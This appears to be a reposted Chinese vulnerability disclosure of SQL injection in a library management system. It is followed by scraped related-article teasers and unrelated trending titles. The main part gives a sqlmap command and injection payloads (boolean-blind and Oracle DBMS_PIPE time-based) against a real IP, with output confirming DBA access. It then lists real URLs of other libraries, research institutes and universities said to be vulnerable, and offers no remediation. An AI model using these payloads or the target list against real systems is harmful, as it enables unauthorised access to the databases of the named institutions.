某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: ID

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: ID=123 AND 7478=7478

Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)

---

[11:34:18] [INFO] the back-end DBMS is Oracle

web server operating system: Windows 2008 R2 or 7

web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727

back-end DBMS: Oracle

[11:34:18] [INFO] testing if current user is DBA

current user is DBA: True

[11:34:25] [INFO] fetched data logged to text files under '/Users/Leek/Desktop/sqlmap-dev/output/219.242.65.10'

DBA==True

在它的客户名单里测试了几个,

国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/

中国科学院物理研究所:http://libiop.iphy.ac.cn/

中国科学院软研所:http://124.16.136.160:8083/iscas_lib/

还有各种大学用户,

中国矿业大学:http://219.242.65.10/fsweb/Default.aspx

华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb

华北科技学院:http://211.81.174.140/

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

高校图书馆管理系统 php 漏洞,某通用图书馆管理系统SQL注入_MySQL相关推荐

  1. java新闻管理系统代码下载_通用新闻管理系统

    通用新闻管理系统是 由岁月工作室基于aspCMS二次研发而成.我们致力于中小企业网站的搭建.根据现有企业的需求.开发适合企业的模块, 让企业可以轻松搭建适合自己企业的网站,后台功能强大,管理便捷.代码 ...

  2. mysql注入漏洞语句,web安全之sql注入漏洞

    概念 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力 ...

  3. 本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)

    目录 注册登录模块 源码 测试 源码加固 文件上传模块 源码 测试 源码加固 发布动态模块 源码 测试 源码加固 本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解. 源码:利用PHP开发具 ...

  4. Emlog漏洞————Emlog相册插件前台SQL注入+Getshell

    Emlog简介 Emlog是"Every Memory Log"的简介,意即:点滴记忆.它是一款基于PHP语言哈MYSQL数据库的开源.免费.功能强大的个人或多人联合撰写的博客系统 ...

  5. php拒绝式服务漏洞防御,PHPYUN最新版SQL注入(绕过防御)

    ### 简要描述: PHPYUN最新版(phpyun_v3.1.0604_gbk)SQL注入(绕过防御) ### 详细说明: PHPYUN最新版:phpyun_v3.1.0604_gbk 文件/mem ...

  6. 使用Python打造基本WEB漏洞扫描器(一) 网站爬虫+SQL注入检测

    一.实验介绍 扫描器需要实现功能的思维导图: 1.1 实验内容 编写一个简单的多线程爬虫,用于对网站地址进行爬取,编写一个简单的sql注入工具,用于对网站地址进行sql注入的检测. 1.2 实验知识点 ...

  7. web漏洞“小迪安全课堂笔记”SQL注入

    文章目录 前言 SQL注入是什么? 注入原理 数据库结构 mysql数据库 参数类型 请求方法 如何判断注入点? 判断注入 1.信息收集 2.数据注入 3.高权限注入 魔术引号开关 跨库注入 获取所有 ...

  8. PHP网站漏洞poc,phpyun某处SQL注入漏洞含POC

    ### 简要描述: 20141231 ### 详细说明: phpyun使用了360和一个自身的防护脚本 我们来看看过滤情况 [](https://images.seebug.org/upload/20 ...

  9. 海豚php框架漏洞,代码审计 - dolphin.pro cms SQL注入漏洞,Bypass过滤规则

    Dolphin是一个网络软件平台,你可以下载并使用它来建立你自己的利基社交网络.社区网站.在线俱乐部或基于兴趣的社交网站. 代码分析: 1./flash/modules/chat/inc/action ...

最新文章

  1. ologit模型与logit_Stata-多元 Logit 模型详解 (mlogit)
  2. MySQL 5.5.35 单机多实例配置详解
  3. mysql timestamp json_mysql中timestamp,datetime,int类型的区别与优劣
  4. Entity Framework Core Like 查询揭秘
  5. 初一辍学学php能行吗_《夺冠》破7亿,辍学的农村姑娘成排球女王,朱婷:百炼才能成钢...
  6. java安装路径_java环境变量和查看安装路径
  7. 信号量——内核信号量、POSIX信号量、system V信号量
  8. MathType公式编辑器的下载安装及导入Word
  9. C6000 DSP技术深度探索(3)-中断向量表
  10. 天天写业务代码的程序员怎么成为大牛(转自知乎李运华的回答 PS:很干货)
  11. winform控件之notifyicon
  12. projection theorem
  13. 电商等一些互联网项目涉及到什么技术?
  14. 监听微信公众号消息,获取微信公众号消息
  15. 4G边缘计算工业路由器与传统4G工业路由器的区别
  16. cmake编译pcl程序时出现‘boost::this_thread::hiden::sleep_until(timespec const)’未定义的引用
  17. 台式机电源相关参数说明
  18. 买服务器做网站 镜像选什么,如何做网站镜像,网站镜像方法
  19. LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
  20. Angular之HelloWorld——Angular(1)

热门文章

  1. VS2019 .NET4.7 C# 和Matlab混合编程 可能出错的地方及解决办法
  2. Web安全笔试题总结(2022持续更新)
  3. iis(虚拟服务器),iis虚拟主机控制面板(虚拟主机专用控制面板)
  4. Live2D Web端实现
  5. Git ,TortoiseGit小乌龟使用技巧
  6. 原生开发什么意思_APP原生开发和混合开发的区别你了解多少
  7. MySQL 安装包下载
  8. 技术改造奖补,湖北省技术改造项目奖励补贴标准和申报
  9. 作品1:MIDI彩虹钢琴(将简谱或五线谱制作成mid)
  10. 如何在VSCode中添加Python解释器并安装Python库